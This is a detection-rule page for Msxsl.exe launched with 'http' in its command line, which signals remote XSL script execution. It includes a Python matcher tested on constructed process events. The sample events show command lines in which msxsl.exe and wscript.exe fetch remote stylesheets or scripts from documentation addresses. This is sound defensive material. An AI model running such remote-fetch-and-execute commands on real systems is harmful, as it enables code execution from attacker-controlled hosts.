
Summary
This detection rule monitors for execution of the Msxsl.exe binary with the keyword 'http' present in its command line. An 'http' substring in the arguments typically means that the XSL stylesheet (or the XML input) is being fetched over the network rather than read from disk, which is the pattern used for remote execution via XSL transformation: msxsl.exe will run script embedded in the stylesheet it applies. Msxsl.exe is not part of a standard Windows installation and has been deprecated by Microsoft, so any execution of it is already unusual. The rule captures process creation events whose image path ends with 'msxsl.exe' and whose command line contains 'http' (which also covers 'https' URLs). Because the tool is seldom used legitimately, the rule's level is high. Remaining false positives come from developers or build scripts that apply a remote stylesheet, or from local paths that happen to contain the substring 'http'; these should be filtered on the specific image path or command line rather than by loosening the rule.
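The following is an added example, not part of the original rule page, that implements the matching logic described above over a few constructed process creation events so the rule can be sanity-checked offline. It assumes Sysmon-style field names (EventType, Image, CommandLine); the comparison is case-insensitive, as Sigma string matching is by default, and the image check compares the file name component to avoid matching names that merely end in "msxsl.exe". The URL extraction is an added triage aid, not part of the rule.

```python
"""Reference matcher for 'Msxsl.exe with http in command line' (added example)."""
import re
from typing import Dict, Iterable, List

# Field names follow the Sysmon process creation event (assumption).
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def matches_rule(event: Dict[str, str]) -> bool:
    """Return True when the event satisfies the rule described in the summary:
    a process creation whose image is msxsl.exe and whose command line contains 'http'.
    Matching is case-insensitive, mirroring Sigma's default string matching."""
    if event.get("EventType") != "ProcessCreate":
        return False
    image = event.get("Image", "").lower()
    # Compare the file name component so that e.g. 'notmsxsl.exe' does not match.
    basename = image.rsplit("\\", 1)[-1]
    cmdline = event.get("CommandLine", "").lower()
    return basename == "msxsl.exe" and "http" in cmdline


def find_alerts(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the rule over a stream of events and return one alert per hit,
    with the URLs pulled out of the command line for triage."""
    alerts = []
    for ev in events:
        if matches_rule(ev):
            alerts.append({
                "image": ev["Image"],
                "urls": URL_RE.findall(ev["CommandLine"]),
            })
    return alerts


# Constructed sample events; addresses are RFC 5737 documentation ranges.
EVENTS = [
    {   # remote stylesheet over http: should match
        "EventType": "ProcessCreate",
        "Image": r"C:\Tools\msxsl.exe",
        "CommandLine": r"msxsl.exe C:\Users\u\input.xml http://192.0.2.10/style.xsl",
    },
    {   # uppercase image and https URLs: should still match
        "EventType": "ProcessCreate",
        "Image": r"C:\Tools\MSXSL.EXE",
        "CommandLine": r"MSXSL.EXE https://203.0.113.5/a.xml https://203.0.113.5/b.xsl -o out.txt",
    },
    {   # purely local transform: no 'http' in the command line, no match
        "EventType": "ProcessCreate",
        "Image": r"C:\Tools\msxsl.exe",
        "CommandLine": r"msxsl.exe report.xml report.xsl -o report.html",
    },
    {   # different binary fetching a URL: outside this rule's scope
        "EventType": "ProcessCreate",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"wscript.exe http://192.0.2.10/x.js",
    },
    {   # not a process creation event: the rule only looks at process creation
        "EventType": "NetworkConnect",
        "Image": r"C:\Tools\msxsl.exe",
        "CommandLine": r"msxsl.exe a.xml http://192.0.2.10/s.xsl",
    },
]


if __name__ == "__main__":
    for alert in find_alerts(EVENTS):
        print(f"ALERT image={alert['image']} urls={alert['urls']}")
```

Running the module prints two alerts: the first and second constructed events. Note that the substring check on 'http' is deliberately broad; a command line such as `msxsl.exe C:\httpd\conf.xml local.xsl` would also match, which is the false positive class the summary mentions.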
Categories
- Endpoint
- Windows
Data Sources
- Process
ATT&CK Techniques
- T1220
Created: 2023-11-09